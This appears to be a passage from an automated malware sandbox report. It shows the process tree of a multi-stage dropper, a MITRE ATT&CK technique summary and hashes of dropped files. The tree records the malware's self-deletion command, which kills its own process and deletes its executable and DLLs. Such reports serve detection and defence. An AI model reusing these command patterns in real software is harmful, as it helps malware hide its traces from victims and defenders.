                                                                                • C:\Users\Admin\Documents\PCSM0Q5pJVEkHrpE87Mi2Aag.exe
                                                                                  "C:\Users\Admin\Documents\PCSM0Q5pJVEkHrpE87Mi2Aag.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:5032
                                                                                  • C:\Users\Admin\Documents\PCSM0Q5pJVEkHrpE87Mi2Aag.exe
                                                                                    "C:\Users\Admin\Documents\PCSM0Q5pJVEkHrpE87Mi2Aag.exe"
                                                                                    7⤵
                                                                                    • Modifies data under HKEY_USERS
                                                                                    PID:5636
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 816
                                                                                    7⤵
                                                                                    • Program crash
                                                                                    PID:4412
                                                                                • C:\Users\Admin\Documents\N_UaR2Gb4B9MWR75a_hfLMDR.exe
                                                                                  "C:\Users\Admin\Documents\N_UaR2Gb4B9MWR75a_hfLMDR.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks whether UAC is enabled
                                                                                  PID:4864
                                                                                • C:\Users\Admin\Documents\v0oKSuq07wLDz5K5lOXpjyL8.exe
                                                                                  "C:\Users\Admin\Documents\v0oKSuq07wLDz5K5lOXpjyL8.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:4964
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im v0oKSuq07wLDz5K5lOXpjyL8.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\v0oKSuq07wLDz5K5lOXpjyL8.exe" & del C:\ProgramData\*.dll & exit
                                                                                    7⤵
                                                                                      PID:5156
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im v0oKSuq07wLDz5K5lOXpjyL8.exe /f
                                                                                        8⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2204
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        8⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4712
                                                                                  • C:\Users\Admin\Documents\idtlNDuZ1zW9cF2zsd6ZLzD4.exe
                                                                                    "C:\Users\Admin\Documents\idtlNDuZ1zW9cF2zsd6ZLzD4.exe"
                                                                                    6⤵
                                                                                      PID:4548
                                                                                      • C:\Users\Admin\Documents\idtlNDuZ1zW9cF2zsd6ZLzD4.exe
                                                                                        C:\Users\Admin\Documents\idtlNDuZ1zW9cF2zsd6ZLzD4.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1412
                                                                                    • C:\Users\Admin\Documents\W_06pMJNKqUoCySQyS3Pca7i.exe
                                                                                      "C:\Users\Admin\Documents\W_06pMJNKqUoCySQyS3Pca7i.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5016
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 660
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4376
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 672
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:1632
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 680
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4376
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 660
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5220
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 992
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5464
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1220
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:6016
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1260
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:2288
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1360
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4564
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1668
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4580
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1856
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5556
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5016 -s 1812
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:1184
                                                                                    • C:\Users\Admin\Documents\i2qZdO_VZGLo5nOuli_Ju_TJ.exe
                                                                                      "C:\Users\Admin\Documents\i2qZdO_VZGLo5nOuli_Ju_TJ.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4340
                                                                                      • C:\Users\Admin\Documents\i2qZdO_VZGLo5nOuli_Ju_TJ.exe
                                                                                        "C:\Users\Admin\Documents\i2qZdO_VZGLo5nOuli_Ju_TJ.exe"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        • Checks processor information in registry
                                                                                        PID:4548
                                                                                    • C:\Users\Admin\Documents\G_cakBul3rbctZpQ7tOQlS1w.exe
                                                                                      "C:\Users\Admin\Documents\G_cakBul3rbctZpQ7tOQlS1w.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Checks BIOS information in registry
                                                                                      • Checks whether UAC is enabled
                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                      PID:8
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sonia_2.exe
                                                                                  4⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:3852
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_2.exe
                                                                                    sonia_2.exe
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks SCSI registry key(s)
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    PID:2600
                                                                          • c:\windows\system32\svchost.exe
                                                                            c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                            1⤵
                                                                              PID:1104
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                              1⤵
                                                                              • Drops file in System32 directory
                                                                              PID:1028
                                                                              • C:\Users\Admin\AppData\Roaming\bticagd
                                                                                C:\Users\Admin\AppData\Roaming\bticagd
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5124
                                                                              • C:\Users\Admin\AppData\Roaming\bticagd
                                                                                C:\Users\Admin\AppData\Roaming\bticagd
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:2304
                                                                              • C:\Users\Admin\AppData\Roaming\bticagd
                                                                                C:\Users\Admin\AppData\Roaming\bticagd
                                                                                2⤵
                                                                                • Loads dropped DLL
                                                                                • Checks SCSI registry key(s)
                                                                                • Suspicious behavior: MapViewOfSection
                                                                                PID:5152
                                                                            • c:\windows\system32\svchost.exe
                                                                              c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                              1⤵
                                                                                PID:60
                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                1⤵
                                                                                • Suspicious use of SetThreadContext
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3816
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                  2⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Checks processor information in registry
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Modifies registry class
                                                                                  PID:4084
                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                1⤵
                                                                                • Process spawned unexpected child process
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:3928
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                  2⤵
                                                                                  • Loads dropped DLL
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:2036
                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                1⤵
                                                                                • Process spawned unexpected child process
                                                                                PID:3836
                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                  2⤵
                                                                                  • Loads dropped DLL
                                                                                  • Modifies registry class
                                                                                  PID:4980
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                1⤵
                                                                                  PID:5740
                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                  1⤵
                                                                                  • Process spawned unexpected child process
                                                                                  PID:5812
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                    2⤵
                                                                                    • Loads dropped DLL
                                                                                    • Modifies registry class
                                                                                    PID:5852
                                                                                • C:\Users\Admin\AppData\Local\Temp\2602.exe
                                                                                  C:\Users\Admin\AppData\Local\Temp\2602.exe
                                                                                  1⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:2316
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 2602.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2602.exe" & del C:\ProgramData\*.dll & exit
                                                                                    2⤵
                                                                                      PID:3776
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im 2602.exe /f
                                                                                        3⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:5492
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        3⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:4908
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                    1⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Modifies Internet Explorer settings
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5184
                                                                                  • C:\Windows\system32\browser_broker.exe
                                                                                    C:\Windows\system32\browser_broker.exe -Embedding
                                                                                    1⤵
                                                                                    • Modifies Internet Explorer settings
                                                                                    PID:5608
                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: MapViewOfSection
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5360
                                                                                  • C:\Windows\servicing\TrustedInstaller.exe
                                                                                    C:\Windows\servicing\TrustedInstaller.exe
                                                                                    1⤵
                                                                                      PID:1380
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                      1⤵
                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                      PID:4352
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7731.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\7731.exe
                                                                                      1⤵
                                                                                        PID:5556
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies Internet Explorer settings
                                                                                        • Modifies registry class
                                                                                        PID:2204
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Executes dropped EXE
                                                                                        • Modifies registry class
                                                                                        PID:5228
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5692
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:5632
                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                        1⤵
                                                                                        • Modifies registry class
                                                                                        PID:4688

                                                                                      Network

                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                      Persistence

                                                                                      Modify Existing Service

                                                                                      1
                                                                                      T1031

                                                                                      Registry Run Keys / Startup Folder

                                                                                      1
                                                                                      T1060

                                                                                      Defense Evasion

                                                                                      Modify Registry

                                                                                      4
                                                                                      T1112

                                                                                      Disabling Security Tools

                                                                                      1
                                                                                      T1089

                                                                                      Virtualization/Sandbox Evasion

                                                                                      1
                                                                                      T1497

                                                                                      Install Root Certificate

                                                                                      1
                                                                                      T1130

                                                                                      Credential Access

                                                                                      Credentials in Files

                                                                                      4
                                                                                      T1081

                                                                                      Discovery

                                                                                      Query Registry

                                                                                      6
                                                                                      T1012

                                                                                      Virtualization/Sandbox Evasion

                                                                                      1
                                                                                      T1497

                                                                                      System Information Discovery

                                                                                      6
                                                                                      T1082

                                                                                      Peripheral Device Discovery

                                                                                      1
                                                                                      T1120

                                                                                      Remote System Discovery

                                                                                      1
                                                                                      T1018

                                                                                      Collection

                                                                                      Data from Local System

                                                                                      4
                                                                                      T1005

                                                                                      Command and Control

                                                                                      Web Service

                                                                                      1
                                                                                      T1102

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\ProgramData\freebl3.dll
                                                                                        MD5

                                                                                        ef2834ac4ee7d6724f255beaf527e635

                                                                                        SHA1

                                                                                        5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                                        SHA256

                                                                                        a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                                        SHA512

                                                                                        c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                                      • C:\ProgramData\mozglue.dll
                                                                                        MD5

                                                                                        8f73c08a9660691143661bf7332c3c27

                                                                                        SHA1

                                                                                        37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                        SHA256

                                                                                        3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                        SHA512

                                                                                        0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                      • C:\ProgramData\msvcp140.dll
                                                                                        MD5

                                                                                        109f0f02fd37c84bfc7508d4227d7ed5

                                                                                        SHA1

                                                                                        ef7420141bb15ac334d3964082361a460bfdb975

                                                                                        SHA256

                                                                                        334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                        SHA512

                                                                                        46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\libcurl.dll
                                                                                        MD5

                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                        SHA1

                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                        SHA256

                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                        SHA512

                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\libcurlpp.dll
                                                                                        MD5

                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                        SHA1

                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                        SHA256

                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                        SHA512

                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\libgcc_s_dw2-1.dll
                                                                                        MD5

                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                        SHA1

                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                        SHA256

                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                        SHA512

                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\libstdc++-6.dll
                                                                                        MD5

                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                        SHA1

                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                        SHA256

                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                        SHA512

                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\libwinpthread-1.dll
                                                                                        MD5

                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                        SHA1

                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                        SHA256

                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                        SHA512

                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\setup_install.exe
                                                                                        MD5

                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                        SHA1

                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                        SHA256

                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                        SHA512

                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\setup_install.exe
                                                                                        MD5

                                                                                        a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                        SHA1

                                                                                        e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                        SHA256

                                                                                        0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                        SHA512

                                                                                        c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.exe
                                                                                        MD5

                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                        SHA1

                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                        SHA256

                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                        SHA512

                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.exe
                                                                                        MD5

                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                        SHA1

                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                        SHA256

                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                        SHA512

                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_1.txt
                                                                                        MD5

                                                                                        6e43430011784cff369ea5a5ae4b000f

                                                                                        SHA1

                                                                                        5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                                                                        SHA256

                                                                                        a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                                                                        SHA512

                                                                                        33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_2.exe
                                                                                        MD5

                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                        SHA1

                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                        SHA256

                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                        SHA512

                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_2.txt
                                                                                        MD5

                                                                                        18ffdaa7a2c9906db10ffc13f7c73d23

                                                                                        SHA1

                                                                                        f195661bc0f9735d02fbe0e937bfd80cf0bcb11f

                                                                                        SHA256

                                                                                        365bbeb36a288d829c8dc0f1bf7f70949dd10474586cfc7123c1503256b9e5c3

                                                                                        SHA512

                                                                                        db1f81c5b6cac59d6e58e8ab4020bdef7386fa1aa7297f57f693334b70d3dd553ab844f85f92e9903b667cae19f30f188f84939ac0bba2f5999d5bf89793ea34

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_3.exe
                                                                                        MD5

                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                        SHA1

                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                        SHA256

                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                        SHA512

                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_3.txt
                                                                                        MD5

                                                                                        ee658be7ea7269085f4004d68960e547

                                                                                        SHA1

                                                                                        979afc4726af14d9079b6cf288686b0e7e4a17e5

                                                                                        SHA256

                                                                                        d7e078e3e520767a92acb1eaadf4c7ef75f30e215be4dddfebe684c2504c6fe3

                                                                                        SHA512

                                                                                        fc77c079d152b595e249c13b9b0ca97d525407e228c416630a2565707eaacd6805fe1a1c6029b0032d493ae5b67c7d566cc19ab317d9c8e56dfdabc3646d5b1e

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_4.exe
                                                                                        MD5

                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                        SHA1

                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                        SHA256

                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                        SHA512

                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_4.txt
                                                                                        MD5

                                                                                        6765fe4e4be8c4daf3763706a58f42d0

                                                                                        SHA1

                                                                                        cebb504bfc3097a95d40016f01123b275c97d58c

                                                                                        SHA256

                                                                                        755a4266245c52bcd0328044c8a0908b2daafbad140cee06830b991493f21f60

                                                                                        SHA512

                                                                                        c6b8d328768040b31aad0441258240ce8e99a80dba028462bd03ad9d5964d4877c296f25a5a2ca59bcafe0ad75297da39352c17f3df1bb79ec091e5ace3b5d55

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_5.exe
                                                                                        MD5

                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                        SHA1

                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                        SHA256

                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                        SHA512

                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_5.txt
                                                                                        MD5

                                                                                        0c3f670f496ffcf516fe77d2a161a6ee

                                                                                        SHA1

                                                                                        0c59d3494b38d768fe120e0a4ca2a1dca7567e6e

                                                                                        SHA256

                                                                                        8ed9f410b41e51f09304e5cdadc4d61f82562c9ee15be810e063f2f568812dd0

                                                                                        SHA512

                                                                                        bce80fa77557683645480ec28bf5f3a4facb780728d709166890c18decb2095509f69c524e4ce5fbcb48788961554be0467dc78db70f1fd2d242dbd5922a1095

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_6.exe
                                                                                        MD5

                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                        SHA1

                                                                                        82a535e1277ea7a80b809cfeb97dcfb5a5d48a37

                                                                                        SHA256

                                                                                        a9083c13dd04bf55cc8e29ab4fe8a0053edf3ffe9b1e5ec31db207a45a98aaaf

                                                                                        SHA512

                                                                                        f7dc8d9a8726a6da6226a059094fcaf45190b2b41e6fae7d2aa48eacbd1dfc3b871770c74b1504801f5e7a05f1e3b47ac13cffc8190089f3d07e5c55aa725898

                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS0E0E1894\sonia_6.txt
                                                                                        MD5

                                                                                        2eb68e495e4eb18c86a443b2754bbab2

                                                                                        SHA1

